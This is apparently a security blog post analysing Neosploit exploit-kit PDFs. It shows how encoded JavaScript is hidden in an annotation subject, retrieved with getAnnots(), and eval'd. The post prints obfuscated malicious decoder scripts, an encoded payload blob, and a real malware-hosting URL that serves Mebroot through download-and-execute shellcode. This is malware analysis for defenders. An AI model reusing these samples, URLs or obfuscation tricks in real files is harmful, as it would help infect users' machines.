PDF Obfuscation using getAnnots()

Since around October 2009, Neosploit¹, a black-market exploit toolkit, has been generating PDF files in a slightly new way that many parsers find difficult to analyze for maliciousness. In summary, all of the metadata in a PDF is accessible from the Acrobat Javascript environment, and this metadata is being used to obscure embedded Javascript code. To find the exploit, a PDF parser would need to fill in all the document objects with the correct data and then evaluate the Javascript. (Needless to say, many signature-based PDF parsers don't do this.) These malicious PDFs ultimately install Mebroot (aka Sinowal)².

[And, oh yeah, our product detects this.]

Breaking News

Update: There’s another exploit toolkit doing similar metadata tricks to obscure a CVE-2009-4324 attack. (That’s the most recent 0-day.)




I’m going to use this for most of my examples (warning: live as of this writing):

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php

The Wepawet Analysis
The Virus Total Analysis on the downloaded EXE (56a6e96863f6dc0c5c5c64fca6bd3c52)


A Brief Word about Neosploit¹

Like some other toolkits, you can only hit the first exploit page once per source IP. It returns a 404 if you try to fetch it again. The Javascript is broken up into multiple chunks, fetched by the first chunk, deobfuscated, reassembled, and executed. The URI is slightly polymorphic. For example, all of these are really the same program on the server:

google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py
google.com.analytics.eicyxtaecun.com/nte/TREST11 .asp
google.com.analytics.eicyxtaecun.com/nte/TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/TREST11.html
google.com.analytics.eicyxtaecun.com/nte/TREST11.php
google.com.analytics.eicyxtaecun.com/nte/TREST11.py

[etc.]

Any file starting with “j” appears to be Javascript, “e” appears to be an EXE, and “o” is a polymorphically generated exploit PDF. Observe:

eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL)
jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948: ASCII text, with very long lines
oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317: PDF document, version 1.3

The filename is composed of several fields of hexadecimal value, with separators which are not in the set [0-9a-f] (case sensitive, “F” is a valid separator). From the above example:

j H999a4551 V0100f070006 R00000000102 Td2dcca7b 2 01 L656e2d75730000000000 K91a68948
e H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948320
o H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948317

The “2 01” is the browser version, and “L656e2d75730000000000” means “en-us” (the field is that ASCII string in hex, padded with zero bytes). I haven't bothered to figure out the rest yet.
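As a rough illustration of that field layout, the sketch below splits one of the filenames above at every character outside [0-9a-f] and decodes the L field. The function names are made up for this example. The splitter leaves the "2 01" browser-version digits attached to the T field, since only their position separates them.

```python
import re

def split_fields(name: str) -> tuple[str, dict[str, str]]:
    """Split a Neosploit-style filename into (type letter, {separator: hex value})."""
    kind, rest = name[0], name[1:]  # leading "j", "e" or "o"; note "e" is itself a hex digit
    # Each field is one separator character (anything outside 0-9a-f) plus a run of hex digits.
    fields = dict(re.findall(r"([^0-9a-f])([0-9a-f]*)", rest))
    return kind, fields

def decode_ascii_field(hex_value: str) -> str:
    """Interpret a field as zero-padded ASCII, as the L field appears to be."""
    return bytes.fromhex(hex_value).rstrip(b"\x00").decode("ascii")

kind, fields = split_fields(
    "jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948"
)
language = decode_ascii_field(fields["L"])
```

Here language comes out as en-us. The lowercase l0409 in the other filenames happens to match the Windows locale ID for en-US (0x0409), but whether the toolkit means it that way is only a guess.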

The first chunk of Javascript that hits your browser is shown below. If you started from, say, http://dgvlvhhytlta.com/nte/GNH4.exe, it would fetch the next chunk (the variable pums) from http://dgvlvhhytlta.com/nte/GNH4.exe/jH999a4551V0100f070006… These stages are not in the Wepawet analysis I mentioned above, so I'm including them here for completeness.

<html>
<head>
<script>

function nerot(o6v28_IX_KM, D5___o){var O_Pp6_l = arguments.callee;O_Pp6_l = O_Pp6_l.toString();var X6q8_bl = 0;var U_a8___ej = "a" + "f";var Ghc62j5r1Wr8P = document.getElementById(U_a8___ej);if (Ghc62j5r1Wr8P) {if (!D5___o) {D5___o = Ghc62j5r1Wr8P.value;}}X6q8_bl++;X6q8_bl++;var firot = new Array();if (o6v28_IX_KM) { firot = o6v28_IX_KM;} else {var tk_048_6R_6CyPe = 0;var ScS1Bncy_d_8 = 0;var G_2__3A_r = 512;var gw55F_B__BBV2 = 49;gw55F_B__BBV2--;while(ScS1Bncy_d_8 < O_Pp6_l.length) {var G_sv_c7x6qjTn = 1;var m8d_GS__whx = O_Pp6_l.charCodeAt(ScS1Bncy_d_8);if (m8d_GS__whx >= gw55F_B__BBV2 && m8d_GS__whx <= (gw55F_B__BBV2 + 9)) {if (tk_048_6R_6CyPe == 4) { tk_048_6R_6CyPe = 0; }if (isNaN(firot[tk_048_6R_6CyPe])) { firot[tk_048_6R_6CyPe] = 0; }firot[tk_048_6R_6CyPe] += m8d_GS__whx;if (firot[tk_048_6R_6CyPe] > G_2__3A_r) {firot[tk_048_6R_6CyPe] -= G_2__3A_r;}tk_048_6R_6CyPe++;}ScS1Bncy_d_8++;}}tk_048_6R_6CyPe = 4;while (tk_048_6R_6CyPe > 0) {if (firot[tk_048_6R_6CyPe - 1] > 256) {firot[tk_048_6R_6CyPe - 1] -= 256;}tk_048_6R_6CyPe--;}var QmyQ7eL0R = 0;var x1Kf_448jleM42 = "";var sp__yv_2g_K04cp = 0;var j_G1g_1 = 0;var T__D6_r = 0;var y_6A__C_u;var pdbpQb = 0;while(j_G1g_1 < D5___o.length) {var T_B203hvS__Wvt = D5___o.substr(j_G1g_1, 1) + "J";var Pbukfx_2f7D__1w = parseInt(T_B203hvS__Wvt, 16);if (T__D6_r) {y_6A__C_u += Pbukfx_2f7D__1w;if (QmyQ7eL0R == 4) {QmyQ7eL0R -= 4;}var iJ_d_Qth = y_6A__C_u;iJ_d_Qth = iJ_d_Qth - (pdbpQb + 2) * firot[QmyQ7eL0R];if (iJ_d_Qth < 0) {var xgY5uT7__QoL = Math.floor(iJ_d_Qth / 256);iJ_d_Qth = iJ_d_Qth - xgY5uT7__QoL * 256;}iJ_d_Qth = String.fromCharCode(iJ_d_Qth);if (X6q8_bl == 1) {x1Kf_448jleM42 += Pbukfx_2f7D__1w;} else if (X6q8_bl == 2) {x1Kf_448jleM42 += iJ_d_Qth;} else {x1Kf_448jleM42 += j_G1g_1;}QmyQ7eL0R++;pdbpQb++;T__D6_r = 0;} else {y_6A__C_u = Pbukfx_2f7D__1w * 16;T__D6_r = 1;}j_G1g_1++;};;eval(x1Kf_448jleM42);return 0;}

</script>
</head>
<body onload="nerot() ;">
<input type="hidden" id="aa" value="1">
<input type="hidden" id="af" value="F2D096B1BB5AA764CBE6B0E3B18 […] 745A6F">
<input type="hidden" id="ab" value="1">
</body>
</html>

And the second chunk:


var pums = 'C8763EB09A160F5F0AC4C
EB76';

 

Find The Pattern

Here are some names of generated PDFs. I've broken the names up into what I believe are separate fields. See if you can find the pattern. None of these is obviously an IP address. (I checked for that.)

AVORP1TREST11.exe/o U2773a43b H918373c0 V03007f35002 R8d56bfa1108 Tdac6495d Q000002fc900801 F0020000a J11000601l0409 Kfa01dcdb317: PDF document, version 1.3
AVORP1TREST11.php/o Hf7b12f26 V0100f060006Rf53e765c102 Tbcf2d195204 l0409 K98c2615b317: PDF document, version 1.3
AVORP1TREST11.py/o H999a4551 V0100f070006R00000000102 Td2dcca7d201 l0409 K91a68948317: PDF document, version 1.3
AVORP1TREST11.py/o H9efd3f2d V03006f35002Rf53e765c102 Td5b83f0c Q000002fa901801 F0020000a J11000601 l0409 K5b7f0e41317: PDF document, version 1.3
TREST11 .asp/o H47834891 V0100f060006 R89a36f9c102 T0cc787be203l0409 K07105315317: PDF document, version 1.3
TREST11 .asp/o H91b0de2f V0100f070006 R8f56bc05102 Tdaf42f62201l0404 K544d4bfe317: PDF document, version 1.3
TREST11 .asp/o Ha98d29bd V0100f060006 R89a36f9c102 Te2cb340e204l0409 K4b290413317: PDF document, version 1.3
TREST11 .asp/o He22f9c5c V03007f35002 R8d56bfa1102 Ta96aa0ae Q000002fc901801 F000c000a J10000601 l0409 Kc5ceb2bf317: PDF document, version 1.3
TREST11 .asp/o Hf7ba1c39 V03005f35002 Rf53e765c102 Tbcff3946 Q000002fd901801 F0020000a J11000601 l0409 K4e3afa12317: PDF document, version 1.3
TREST11.exe/o H30847807 V0100f060006 R89a36f9c102 T7bc0ed53203l0409 K7b4d501b317: PDF document, version 1.3
TREST11.exe/o H3ebec388 V03007f35002 Rf53e765c102 T75fbc09a Q000002fc901801 F002a000a J11000601 l0409 Kaa9ea783317: PDF document, version 1.3
TREST11.exe/o H82fea487 V0100f080006 Rf53e765c102 Tc9bb26de201l0409 Kfee4acbe317: PDF document, version 1.3
TREST11.html/o H8b9e4040 V03007f35002 Rf53e765c102 Tc0db4487 Q000002fd901801 F002a000a J11000601 l0409 K575b6c55317: PDF document, version 1.3
TREST11.html/o H9ee97623 V03006f35002 Rf53e765c108 Td5ad4a05 Q000002fd900801 F0020000a J11000601 l0409 K539b6710317: PDF document, version 1.3
TREST11.html/o Ha98d29bd V0100f060006 Rf53e765c102 Te2cb34e5204 l0409K35e5f3e5317: PDF document, version 1.3
TREST11.html/o Hd6a7ae5c V0100f080006 Rf53e765c102 T9de446b5201 l0409Kab6a7970317: PDF document, version 1.3
TREST11.php/o H47834891 V0100f060006 Rf53e765c102 T0cc6cd94203 l0409K6c8c5ba1317: PDF document, version 1.3
TREST11.php/o Hdfab3f7e V0100f080006 R8d56bfa110a T94ee748e201 l0409K678f4226317: PDF document, version 1.3
TREST11.php/o Hff15790b V03006f35002 Rf53e765c10a Tb4506ce8 Q000002fc901801 F002a000a J00000000 l0409 Kadd89d89317: PDF document, version 1.3
TREST11.py/o H28d77e41 V0100f060006 R7bd67009102 T63951338203 l0409 K3c732e33317: PDF document, version 1.3
TREST11.py/o H9ef9bb5c V03007f35002 Rf53e765c102 Td5bdef71 Q000002fc901801 F0020000a J11000601 l0409 Kd3978d8b317: PDF document, version 1.3
TREST11.py/o Hde8a192b V0100f060006 R8f56bc05102 T95cf8f5f203 l0409 K6f2c23ff317: PDF document, version 1.3
TREST11.py/o He5441011 V0100f070006 R89a36f9c102 Tae012b23201 l0804 Ka373855f317: PDF document, version 1.3
TREST11.py/o Hf9287a3c V03006f35002 Rf53e765c10a Tb26c5103 Q000002fc900801 F0020000a J00000000 l0409 Kf8aab2d0317: PDF document, version 1.3
TREST11.py/o Hfb50394b V03007f35002 Rf53e765c102 Tb0152511 Q00000000901801 F002a000a J11000601 l0409 K77546b04317: PDF document, version 1.3
chrisbecfiis.com/nte/AVORP1TREST1.py/eH999a4551V0100f070006R00000000102Td2b6e14c201l0409K816c9c70320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

 

I guess that's more than a brief word.

How To Speak PDF

The PDF itself is rather clean and easy to read³, so I'll step you through it here.

First⁴, Acrobat checks that the first line is %PDF-1.something and that the last line is %%EOF. The second and third lines from the end are the offset (in bytes) to the cross reference table (the list of objects in the file) and the word startxref. Somewhere near all that is the trailer dictionary, which says there are nine objects in this file.

The Cross Reference table [xref] is consulted next. It says there are nine objects in this table, and that…
Object #1 starts at byte offset 17. (0x11)
Object #2 starts at offset 93. (0x5D), etc…

It's possible to have multiple xref tables by design, so that PDF files can be incrementally updated. [The purpose of this is so that a PDF reader can find each object quickly, without needing to scan the entire file first to locate it, and without needing to rewrite the entire file just to edit something.]

 

xref
0 9                     ← This table has 9 entries, for objects 0 through 8
0000000000 65535 f      ← A "free" (deleted) object; generation 65535 means never reuse this number
0000000017 00000 n      ← Object 1 starts at offset 17 bytes
0000000093 00000 n      ← Object 2 starts at offset 93 bytes
0000000134 00000 n      ← Object 3 starts at offset 134 bytes
                          (The generation number, the second column, goes up by one for any object number freed and reused.)
[etc.]
0000000411 00000 n      ← Object 7 starts at offset 411 bytes
0000000641 00000 n      ← Object 8 (9th counting from 0)
trailer<</Size 9/Root 1 0 R>> ← Nine objects; Object 1 is the top of the document object tree (the /Catalog object).
startxref
9323                    ← Offset to xref above
%%EOF

 

Offset Examples

 

00000000  25 50 44 46 2d 31 2e 33  0d 0a 25 b1 b3 f3 ce 0d  |%PDF-1.3..%.....|
00000010  0a 31 20 30 20 6f 62 6a  3c 3c 2f 54 79 70 65 2f  |.1 0 obj<</Type/|
             Byte 17 (0x11) is a "1"
[…]
00000040  20 52 2f 4f 70 65 6e 41  63 74 69 6f 6e 20 36 20  | R/OpenAction 6 |
00000050  30 20 52 3e 3e 65 6e 64  6f 62 6a 0d 0a 32 20 30  |0 R>>endobj..2 0|
                                                  Byte 93 (0x5D) is a "2"
00000060  20 6f 62 6a 3c 3c 2f 54  79 70 65 2f 4f 75 74 6c  | obj<</Type/Outl|
[…]
00002450  ff 03 a2 65 8b 77 0d 0a  65 6e 64 73 74 72 65 61  |...e.w..endstrea|
00002460  6d 0d 0a 65 6e 64 6f 62  6a 0d 0a 78 72 65 66 0d  |m..endobj..xref.|
                                             Byte 9323 (0x246B) is the "x" of "xref"
00002470  0a 30 20 39 0d 0a 30 30  30 30 30 30 30 30 30 30  |.0 9..0000000000|

 

The comment near the beginning of the file (a % followed by four bytes with their high bits set) warns systems that distinguish between 'text' and 'binary' file modes that this file should be treated as 'binary'.

Brief Syntax Guide

 

  • Anything between % and end-of-line is a comment.
  • Anything between ()'s is a literal string.
  • Anything starting with a / is a Name.
  • Anything inside of []'s is an array.
  • Anything between stream and endstream is a data stream (think of it as a very large string constant or blob).
  • Anything inside of <<>> is a dictionary (name-value pairs), like this:
    <</Type /foo /Thingy 123456>>
  • Indirect objects are defined like Object_Number Generation obj Stuff endobj. For example: 123 45 obj(I'm a literal string)endobj.
  • An indirect object can be used (referenced) anywhere that a normal object (string, integer, etc.) would go, by simply writing the object number and generation number followed by an R. For example: 123 45 R substitutes for that literal string in the example above.
  • Every useful dictionary object has an entry for what /Type it is. For example, the /Catalog type is used for the document tree root, and /Font is used for font objects.

 

That Neosploit PDF

Object #1 (The Catalog object) says that…
Object #2 is the top of the Outline tree (that side panel in your PDF viewer)…
Object #3 is the top of the Page tree…
And to perform the action in Object #6 when the document is opened.

Object #2 says there really isn't an outline for this document.

Object #3 says there is one page in the tree, which is Object #4 .

Object #6 says to execute the Javascript in Object #7.

Object #4 is the descendant of Object #3. It says the page size is 612x792 points (or 8.5x11 inches), and that it contains an Annotation, with the annotation details in Object #5…
Object #5 says that Object #8 is the Subject of this Annotation (The sekret Javascript exploit code).

These are the good parts:
Object #7 is the Javascript that's executed upon document open. It's a decoder for the Javascript hidden in…
Object #8 The Annotation Subject string, a large blob of encoded Javascript.

In PDF-Speak

 


%PDF-1.3
%
Four bytes between 0x80 and 0xFF

1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj
2 0 obj<</Type/Outlines/Count 0>>endobj
3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj
4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj
5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj
6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj
7 0 obj<</Length 158/Filter/FlateDecode>>
stream

The zlib compressed data goes here
endstream
endobj
8 0 obj<</Length 8609/Filter/FlateDecode>>
stream

The other zlib compressed data goes here
endstream
endobj
xref
0 9
0000000000 65535 f
0000000017 00000 n
0000000093 00000 n
0000000134 00000 n
0000000184 00000 n
0000000266 00000 n
0000000358 00000 n
0000000411 00000 n
0000000641 00000 n
trailer<</Size 9/Root 1 0 R>>
startxref
9323
%%EOF
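The walk from the Catalog down to the two interesting streams can be followed mechanically. The sketch below is only that, a sketch: the object bodies are copied from the listing above, ref is a hypothetical helper, and a regular expression is no substitute for a real PDF parser.

```python
import re

# Object bodies copied from the listing above (the two stream objects are left out).
OBJECTS = {
    1: "<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>",
    2: "<</Type/Outlines/Count 0>>",
    3: "<</Type/Pages/Kids[4 0 R]/Count 1>>",
    4: "<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>",
    5: "<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>",
    6: "<</Type/Action/S/JavaScript/JS 7 0 R>>",
}

def ref(obj_num: int, key: str) -> int:
    """Return the object number of the first 'N G R' reference stored under /key."""
    match = re.search(rf"/{key}\s*\[?\s*(\d+) (\d+) R", OBJECTS[obj_num])
    if match is None:
        raise KeyError(f"object {obj_num} has no reference under /{key}")
    return int(match.group(1))

# Catalog -> OpenAction -> JS: the decoder that runs when the document opens.
decoder_stream = ref(ref(1, "OpenAction"), "JS")
# Catalog -> Pages -> Kids -> Annots -> Subj: the encoded second stage.
page = ref(ref(1, "Pages"), "Kids")
payload_stream = ref(ref(page, "Annots"), "Subj")
```

A scanner that only follows /OpenAction will find the harmless-looking decoder in Object #7 and never look at Object #8, which is reachable only through the page's annotation.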

 

Analysis

The /FlateDecode streams are compressed with the deflate algorithm, the exact same one used in PKZip, gzip, and PNG.

If you're trapped on a desert island with only primitive Unix tools, you can just slap a gzip header onto the beginning of the zlib compressed blob and use gunzip to decompress it. (Don't forget to add four bytes to the end for the length.)

 

$ echo -ne "\x1f\x8b\x08\x00BLAH" > example.gz
$ cat stream7 >> example.gz
$ echo -ne "\x00\x00\x00\x00" >> example.gz
$ zcat example.gz |less
zcat: example.gz: invalid compressed data--crc error
zcat: example.gz: invalid compressed data--length error

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

Hey look! It's Javascript!

 

This trick only works as long as bit 5 of the second byte of the zlib stream (the preset dictionary flag) is not set, which I've not seen in a PDF stream yet. The CRC and length errors are expected, because the trailer gunzip finds is not a real gzip trailer. I'd explain why this works, but this blog post is too long already. Compare RFC 1950 Section 2.2 vs. RFC 1952 Section 2.3 if you really want to know. You can also decompress the stream with pencil and paper if you don't have a computer. It's not that difficult; just remember that the bits in each octet are reversed from how they look in RFC 1951. (Why are y'all looking at me like that? I had to fix a corrupt zip file…)

Otherwise use xpdf or Didier Stevens' tool(s) like a normal person.

pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 7
pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 8
python pdf-parser.py -f oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317
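Python's zlib module will also do it in a few lines. This is only a sketch: the function names are mine, and since the real stream bytes aren't reproduced in this post, the sample is a stand-in made by compressing the first line of the Object #7 script. The second function mirrors the gzip trick by skipping the two-byte zlib header and inflating the raw deflate data, leaving the Adler-32 trailer unread.

```python
import zlib

def inflate_stream(raw: bytes) -> bytes:
    """Decompress the bytes found between 'stream' and 'endstream' of a /FlateDecode object."""
    return zlib.decompress(raw)

def inflate_without_header(raw: bytes) -> bytes:
    """Skip the 2-byte zlib header and inflate the raw deflate data that follows."""
    if raw[1] & 0x20:  # bit 5 of the second byte: a preset dictionary id would follow
        raise ValueError("preset dictionary flag is set; the header is longer than 2 bytes")
    inflater = zlib.decompressobj(wbits=-zlib.MAX_WBITS)  # negative wbits means raw deflate
    return inflater.decompress(raw[2:]) + inflater.flush()

# Stand-in for a real stream: compress the first line of the Object #7 script.
script = b"var z; var y; z = y = app.doc;"
sample = zlib.compress(script)
```

Both functions return the same bytes for this sample. On a real file, raw would be whatever sits between the stream and endstream keywords, minus the line ending after stream.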

 

Back to the PDF

This is the uncompressed stream from Object #7.
Almost every PDF I've examined so far has this exact same code in Object #7. (There's apparently a newer version of the toolkit which does a little bit of obfuscation on this block.)

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;

[This getAnnots() usage is completely unrelated to CVE-2009-1492]

 

The uncompressed stream from Object #8 (the subject of this annotation, and the second stage of Javascript) is:
z0dz0az0dz0az09z66z75z6ez63z74z69z […]

The z characters are replaced by %, and then the whole thing unescape()'d. I've seen other variants use y, g, or h, and a little more obfuscation of the code above.

More obfuscation from a different Neosploit toolkit

For Example:


var z; var y; 
 var h = 'edvoazcl'; 
          z = y = app[h.replace(/[aviezjl]/g, '')]; 
         var tmp = 'syncAEEotScan'; y = 0;       z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( {  nPage: 0 }) ;   var s = p[0]; s = s['sub' + 'ject']; var  l =   s.replace(/[zhyg]/g, '%')  ; s =  unescape ( l  ) ;app[h.replace(/[czomdqs]/g, '')]( s);
 s =  ''; z  = 1;
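The property names in that variant are hidden with the same character-stripping trick each time. A quick way to see what they resolve to, using Python's re.sub as a stand-in for the Javascript replace() calls (the variable names here are mine):

```python
import re

hidden = "edvoazcl"

# app[h.replace(/[aviezjl]/g, '')] : which property of app is read?
doc_name = re.sub(r"[aviezjl]", "", hidden)

# app[h.replace(/[czomdqs]/g, '')](s) : which function of app is called on s?
eval_name = re.sub(r"[czomdqs]", "", hidden)

# z[tmp.replace(/E/g, 'n')]() : which method of the document is called?
sync_name = "syncAEEotScan".replace("E", "n")
```

These come out as doc, eval, and syncAnnotScan, so the variant is the same decoder as before with the giveaway strings removed from the source text.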

The 'y' characters are replaced by '%', and then the whole thing is unescaped.


s.replace(/[zhyg]/g, '%')

y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33y56y64y4ay56y62y30y49y64y28y76y5fy5fy4dy61y78y6ay2cy20y70y30y5fy59y32y54y29y7by76y61y72y20y73y5fy5fy5fy51y33y35y68y [...]
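The replace-then-unescape step is easy to reproduce outside of Acrobat. A minimal sketch, assuming the payload only uses %XX escapes (Javascript's unescape() also accepts %uXXXX, which this does not handle); decode_subject is a made-up name, and the sample is the start of the string shown above:

```python
import re
from urllib.parse import unquote

def decode_subject(subject: str, markers: str = "zhyg") -> str:
    """Turn the marker letters back into '%' and undo the percent-encoding."""
    percent_encoded = re.sub(f"[{markers}]", "%", subject)
    # latin-1 maps each %XX to the character with that code, like unescape() does.
    return unquote(percent_encoded, encoding="latin-1")

sample = ("y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33"
          "y56y64y4ay56y62y30y49y64y28")
decoded = decode_subject(sample)
```

The marker letters are safe to replace blindly because none of z, h, y, or g is a hex digit. The decoded sample is two CR/LF pairs, a TAB, and then the beginning of a function definition.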

 

About syncAnnotScan and getAnnots

 

12.5.6.4 Text Annotations
A text annotation represents a “sticky note” attached to a point in the PDF document. When closed, the annotation shall appear as an icon; when open, it shall display a pop-up window containing the text of the note in a font and size chosen by the conforming reader. Text annotations shall not scale and rotate with the page; they shall behave as if the NoZoom and NoRotate annotation flags (see Table 165) were always set. Table 172 shows the annotation dictionary entries specific to this type of annotation.
— From the PDF 1.7 Reference ISO 32000-1:2008.

 

So let's take a look at that annotation object again:


5 0 obj <<
   /Type/Annot
   /Subtype /Text
← This is a Text Annotation

   /Name /Comment
← Default to a Comment-Style Icon for display

   /Rect[25 100 60 115]
← Location of the annotation on page.

   /Subj 8 0 R
← Subject is that object full of encoded Javascript
>>endobj

/Subj
Text representing a short description of the subject being addressed by the annotation. ISO 32000-1

 

The getAnnots() function returns an array of annotation objects, and accepts an associative array with the following possible labels [ibid.]:

nPage
A 0-based page number. If not set, annotations from all pages that match the filter are returned.
nSortBy
A sort method applied to the array. (by Page, Author, Moddate, etc.)
bReverse
If true, causes the array to be reverse sorted with respect to nSortBy.
nFilterBy
Gets only annotations satisfying certain criteria. (Printable, viewable, editable, etc.)

Contrast this with getAnnot() which returns a single Annot object by name.

 

Example

 

// From the Acrobat JavaScript Scripting Reference
// All annotations on the first page, in reverse order by author.
var annots = this.getAnnots({
     nPage:0, 
     nSortBy: ANSB_Author, 
     bReverse: true
});

 

Cleaned Up Code With Commentary

 

var z;
var y; 
z = y = app.doc;
y = 0;
z.syncAnnotScan ( );                  // Acrobat scans for annotations in the
                                      // document, as a background task. 
                                      // This function blocks until all of the
                                      // annotations in the document have been found.
y = z;
var p = y.getAnnots( {  nPage: 0 }) ; // This is the new technique.
                                      // getAnnots() returns a list of annotation
                                      // objects. (For the first page in this case)
var s = p[0].subject;                 // Get the subject from the first annotation
                                      // object.
var l = s.replace(/z/g, '%');         // The 'z' characters are replaced by '%'
s =  unescape (l) ;                   // and then the whole thing unescape()'d
eval(s);                              // Run the second stage Javascript
s = ''; 
z = 1;

 

The third layer of this Javascript onion will decode the next part differently, depending on whether or not the app object is defined. (It is defined inside of Acrobat Reader, but not in most other ECMAScript/Javascript engines.) If your parser doesn't get a "2" out of this:

try {
       if (app) {
          magic_value = 2;
       }
     } catch(e) {
}

Then it's going to eval() gibberish. If decoded correctly, it does a heap spray and exploits Collab.collectEmailInfo(). The shellcode does an HTTP download and execute from:
http://google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320
… What Virustotal says about it: 56a6e96863f6dc0c5c5c64fca6bd3c52 (It's Mebroot).

 

 

       function X6__4k3VdJVb0Id(v__Maxj, p0_Y2T){var s___Q35hFa = arguments.callee;var a4__LfE__5a6 = 0;var Do_
YD6N_7p40_r = 512;s___Q35hFa = s___Q35hFa.toString();try {if (app) {a4__LfE__5a6 = 3;a4__LfE__5a6--;}} catch(e) 
{ }var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;} else {var s4_AeGcS_Ru807 = 0;var OKD
_8Y_tjg = 0;var a_i_qruF1_u = 49;a_i_qruF1_u--;while(OKD_8Y_tjg < s___Q35hFa.length) {var hYE0g_2_q = 1;var rTb_
w_VCb55 = s___Q35hFa.charCodeAt(OKD_8Y_tjg);if (rTb_w_VCb55 >= a_i_qruF1_u && rTb_w_VCb55 <= (a_i_qruF1_u + 9)) 
{if (s4_AeGcS_Ru807 == 4) { s4_AeGcS_Ru807 = 0; }if (isNaN(M8I2Nb0IWaPT7[s4_AeGcS_Ru807])) { M8I2Nb0IWaPT7[s4_Ae
GcS_Ru807] = 0; }M8I2Nb0IWaPT7[s4_AeGcS_Ru807] += rTb_w_VCb55;if (M8I2Nb0IWaPT7[s4_AeGcS_Ru807] > Do_YD6N_7p40_r
) {M8I2Nb0IWaPT7[s4_AeGcS_Ru807] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807++;}OKD_8Y_tjg++;}}s4_AeGcS_Ru807 = 4;Do_YD6N_
7p40_r = 256;while (s4_AeGcS_Ru807 > 0) {var OKD_8Y_tjg = s4_AeGcS_Ru807 - 1;if (M8I2Nb0IWaPT7[OKD_8Y_tjg] > Do_
YD6N_7p40_r) {M8I2Nb0IWaPT7[OKD_8Y_tjg] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807--;}var F_kH_v = 0;var eG76_l = "";var 
JtRA2__j_Ae = 0;var GbFYrkx_PbnQ6f6 = 0;var J8_i60lnd = 0;var ltqGwaY;var I1_EB__2_wf = 0;while(GbFYrkx_PbnQ6f6 
< p0_Y2T.length) {var c_Y4Ti = p0_Y2T.substr(GbFYrkx_PbnQ6f6, 1) + "J";var A_8_QHs1s = parseInt(c_Y4Ti, 16);if (
J8_i60lnd) {ltqGwaY += A_8_QHs1s;if (F_kH_v == 4) {F_kH_v -= 4;}var uYND0Nm = ltqGwaY;uYND0Nm = uYND0Nm - (I1_EB
__2_wf + 2) * M8I2Nb0IWaPT7[F_kH_v];if (uYND0Nm < 0) {var OF0F_A6__nLc = Math.floor(uYND0Nm / 256);uYND0Nm = uYN
D0Nm - OF0F_A6__nLc * 256;}uYND0Nm = String.fromCharCode(uYND0Nm);if (a4__LfE__5a6 == 1) {eG76_l += A_8_QHs1s;} 
else if (a4__LfE__5a6 == 2) {eG76_l += uYND0Nm;} else {eG76_l += GbFYrkx_PbnQ6f6;}F_kH_v++;I1_EB__2_wf++;J8_i60l
nd = 0;} else {ltqGwaY = A_8_QHs1s * 16;J8_i60lnd = 1;}GbFYrkx_PbnQ6f6++;}eval(eG76_l);return 0;}
        X6__4k3VdJVb0Id(0, "10E5E67437933DC36719A1A5A4B40DA4D8A9BBB4DF662A054BCC55EF7CB512E4914F603DD828A821C294
376A3786906F5F3D1C7FB1B98C73DC440954C8F67BAA4FF217C877A39684B01CFBE5C8F36FE309A3E5DD3D532ACC81E69E13B6A05123AA30
741E0DF8121A15D9705C7546E167C3324D8FF4D50A44245B7A9E4533E67484B643C17F54A584CC4320BEECC7C5B852A3F6C5816DA6D2C613
FF28F8BD8E2BE22DCF4A4F26284F81BBAC4CBA451041AAE6864F24E34A4C6885BE54890631A3C1D9A58CAE71C894FD047FA667F3F7D99B7C

[…]B9647DC9");

 

Howto Deobfuscate


Ya'know, if you wanted to…

